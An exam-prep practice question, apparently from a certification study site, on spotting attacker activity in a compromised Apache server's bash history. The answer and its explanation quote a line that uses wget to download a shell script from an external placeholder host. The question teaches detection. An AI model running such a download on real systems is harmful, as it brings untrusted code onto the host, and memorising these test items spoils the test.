A security analyst is reviewing the .bash_history log from a publicly-facing Apache web server that was recently compromised. The analyst is looking for commands executed by the attacker to establish a foothold. Which of the following commands found in the log is the STRONGEST indicator of a malicious payload being downloaded to the server?
The correct answer is wget http://example.com/shell.sh. The use of wget, a non-interactive network downloader, to retrieve an executable script (.sh) from an external, untrusted URL is a classic technique for downloading a malicious payload. This action is a strong indicator of an 'Ingress Tool Transfer' (MITRE ATT&CK T1105), where an attacker brings external tools into the compromised environment. The other commands are legitimate and common administrative actions: ls -l /var/www/html lists files in the webroot, tail -f /var/log/apache2/access.log monitors logs in real-time, and service apache2 restart restarts the web server service. While an attacker might use these commands for reconnaissance or to enable a configuration change, the wget command is the strongest indicator of an external payload being introduced to the system.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What does the 'wget' command do?
Open an interactive chat with Bash
What does 'shell.sh' indicate?
Open an interactive chat with Bash
What does 'command and control' mean in cybersecurity?